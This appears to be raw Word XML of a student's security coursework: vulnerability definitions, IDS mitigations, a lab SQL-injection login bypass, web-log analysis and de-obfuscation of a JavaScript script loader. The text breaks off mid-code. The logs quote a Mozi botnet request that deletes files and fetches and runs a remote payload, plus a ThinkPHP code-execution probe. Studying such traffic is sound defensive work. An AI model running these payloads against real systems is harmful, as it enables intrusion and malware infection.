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C5D" w:rsidP="00F04AEE" w:rsidRDefault="61AD42CE" w14:paraId="2C078E63" w14:textId="6190E685">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="26A6E4A3">
        <w:t>3Q1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="4CDFDD3F" w14:textId="19D79206">
      <w:r>
        <w:t xml:space="preserve">A) I) SQL injection: A vulnerability that allows an attacker to send malicious inputs on a website with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inputs. The capabilities of an SQLi attack involve elevation of privilege, Information Gathering, Tampering, and Denial of Service (through computationally expensive requests)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="21D264D1" w14:textId="7F3FB400">
      <w:r>
        <w:t xml:space="preserve">Command injection: A vulnerability that allows an attacker to execute arbitrary shell commands on a server. The capabilities of Command Injection involve elevation of privilege, information gathering, Denial of Service </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="75C556C8" w14:textId="43CB2938">
      <w:r w:rsidR="09E6847F">
        <w:rPr/>
        <w:t xml:space="preserve">Remote file inclusion: A vulnerability that targets webpages which dynamically reference </w:t>
      </w:r>
      <w:r w:rsidR="4CC59D75">
        <w:rPr/>
        <w:t xml:space="preserve">external </w:t>
      </w:r>
      <w:r w:rsidR="09E6847F">
        <w:rPr/>
        <w:t xml:space="preserve">scripts to allow an attacker to get malicious code running on the webserver. The capabilities of RFI include information gathering and tampering, elevation of privilege. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="0879A8BA" w14:textId="1FBBC59B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) How does an IDS mitigate the 3 vulnerabilities above: An IDS uses deep packet monitoring to search for potentially malicious information in the packet payload.  For example, a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>signature based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IDS could be useful to detect SQLi requests being sent to the server, looking for escape chars in the packet payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="16E91D01" w14:textId="2B9E898E">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IDS can filter requests that include SQL commands to prevent SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="062B5139" w14:textId="011F49A6">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IDS can filter requests that include shell commands using regex patterns to prevent Shell injections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="6E4DABD7" w14:textId="56DB43FE">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IDS can specifically filter packet requests based on the endpoint/route it is trying to access, and only allow certain request parameters for file inclusion (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘admin’,’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>’,’profile’), thus dropping any other requests, and preventing remote file inclusion attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="1C7681F4" w14:textId="7D32A700"/>
    <w:p w:rsidR="09E6847F" w:rsidP="3A7F4D5A" w:rsidRDefault="09E6847F" w14:paraId="13DDD89D" w14:textId="2C1E5A81">
      <w:r>
        <w:t xml:space="preserve">Its limitations: Especially for the attacks given above, it would be </w:t>
      </w:r>
      <w:r w:rsidR="3A7F4D5A">
        <w:t xml:space="preserve">quite computationally expensive to have an IDS conduct deep packet inspection for all the requests on a webpage. If the IDS isn’t a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="3A7F4D5A">
        <w:t>signature based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="3A7F4D5A">
        <w:t xml:space="preserve"> IDS it can suffer from false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D0FE369" w:rsidP="7D0FE369" w:rsidRDefault="7D0FE369" w14:paraId="1A9BB0CF" w14:textId="5B7BC62B"/>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="1A02ED55" w14:textId="383C3C43">
      <w:r>
        <w:t>B) SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="5F52FB5A" w14:textId="74B7039D">
      <w:r>
        <w:t xml:space="preserve">I) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to /hidden/help.html is in the comments in the source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09E6847F" w:rsidP="7D0FE369" w:rsidRDefault="09E6847F" w14:paraId="1C4CA238" w14:textId="6DAB0772">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> How do you extract data?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="309E047B" w:rsidP="7D0FE369" w:rsidRDefault="309E047B" w14:paraId="1C0DF2D3" w14:textId="5538DEF4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Iii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidRPr="7D0FE369">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>bt@cybersec.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> available on the help page listed above, however this is a non-admin user.</w:t>
      </w:r>
      <w:r w:rsidR="3BE5CB3B">
        <w:t xml:space="preserve"> (you can log in using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022191A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0022191A">
        <w:instrText>HYPERLINK "mailto:bt@cybersec.fun" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="0022191A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="7D0FE369" w:rsidR="3BE5CB3B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>bt@cybersec.fun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022191A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="3BE5CB3B">
        <w:t xml:space="preserve">' -- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="3BE5CB3B">
        <w:t>“ as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="3BE5CB3B">
        <w:t xml:space="preserve"> a username. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  ffe.is contains database admin</w:t>
      </w:r>
      <w:r w:rsidR="1C3971BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="7D0FE369" w:rsidR="1C3971BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>db456@cybersec.fun</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="018919A8">
        <w:t>, however the same method to log in does not seem to work for it... not sure what to do here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D0FE369" w:rsidP="7D0FE369" w:rsidRDefault="7D0FE369" w14:paraId="176FF32C" w14:textId="51847895"/>
    <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="39A4D634" w14:textId="440B4288">
      <w:r>
        <w:t>Q2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="5ECAEC35" w14:paraId="7D14EB3A" w14:textId="4E190DD2">
      <w:r>
        <w:t>A) Note files are available in the file folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidRDefault="415D376B" w14:paraId="081B26E7" w14:textId="691E03F0">
      <w:r w:rsidRPr="415D376B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ID: 9 193.27.229.26 331.cybersec.fun - [25/Oct/2020:09:28:19 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=md5&amp;vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 89 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="415D376B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="415D376B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="2AABDAF6" w14:textId="30B44493">
      <w:r>
        <w:t xml:space="preserve">Seems to be related this </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="415D376B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>this</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidP="7EAE1F50" w:rsidRDefault="415D376B" w14:paraId="687B11B3" w14:textId="40A2E8E1">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ID:71 115.53.225.155 331.cybersec.fun - [28/Oct/2020:11:54:30 +0000] "GET /setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>*;wget</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>+http://115.53.225.155:34512/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1 HTTP/1.0" 200 89 "-" "-"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="415D376B" w14:paraId="208F91C0" w14:textId="65BB145B">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Command injection / remote code execution? - Seems to be related to </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="7EAE1F50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>the Mozi botnet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="5065BA75" w14:textId="77AA35A8">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>INFORMATION GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="39C98B77" w14:textId="37A5E289">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ID:39 82.145.220.49 331.cybersec.fun - [26/Oct/2020:13:45:34 +0000] "GET /wp-content/plugins/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>superstorefinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-wp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/docs.js HTTP/1.1" 404 335 "</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="7EAE1F50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://331.cybersec.fun/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">" "Opera/9.80 (Android; Opera Mini/7.6.40234/187.18; U; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) Presto/2.12.423 Version/12.16"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="6A5D10D0" w14:textId="102F02A3">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="4B5C3B84" w14:textId="0E0A0EF2">
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Drop all requests which are made to routes that are not available or accessible on the server-side. It will stop attackers from learning more about the server-side system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="7BA657D1" w14:textId="16636555"/>
    <w:p w:rsidR="415D376B" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="1B817971" w14:textId="7FFE5952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Is there a third one? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="415D376B" w:rsidP="415D376B" w:rsidRDefault="7EAE1F50" w14:paraId="25D48C3B" w14:textId="1F27AA78">
      <w:r>
        <w:t>ID:81 35.184.160.78 331.cybersec.fun - [28/Oct/2020:15:17:10 +0000] "GET /off-path.pdf HTTP/1.1" 200 574724 "-" "</w:t>
      </w:r>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Go-http-client/1.1</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="2D8E0E2B" w14:textId="0743F1F2">
      <w:r>
        <w:t>Spoofing user agent? (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>probably</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Golang http API?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0F7DB626" w14:textId="18527732"/>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="60C4CD09" w14:textId="05D5BD45">
      <w:r>
        <w:t>b)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="7DC73E5B" w14:textId="5DD5AB03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="70C8952C" w14:textId="6F390903">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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atob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(a) returns the string:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="46DF2AAC" w14:textId="37DED1CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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"/* good start, keep going... */\n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nwith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> (document</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">\n    var e;\n    e = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">('\\x73\\x63\\x72\\x69\\x70\\x74');\n    e.setAttribute('\\x73\\x72\\x63','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x6e\\x61\\x68\\x2e\\x66\\x75\\x6e\\x2f\\x71\\x32\\x62\\x69\\x2e\\x6a\\x73');\n    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(e);\n}\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="5657C08D" w14:textId="0BEC7B32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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Which is equivalent to the following</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de-obfuscated </w:t>
      </w:r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JavaScript code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="659233F6" w14:textId="387CE372">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with (document) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="3D9C943F" w14:textId="3AAC09E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  var </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="15E2170B" w14:textId="2F57D058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  e = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("script"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="7EAE1F50" w:rsidP="7EAE1F50" w:rsidRDefault="7EAE1F50" w14:paraId="0B15A100" w14:textId="54B6A3AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="7EAE1F50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="7EAE1F50">
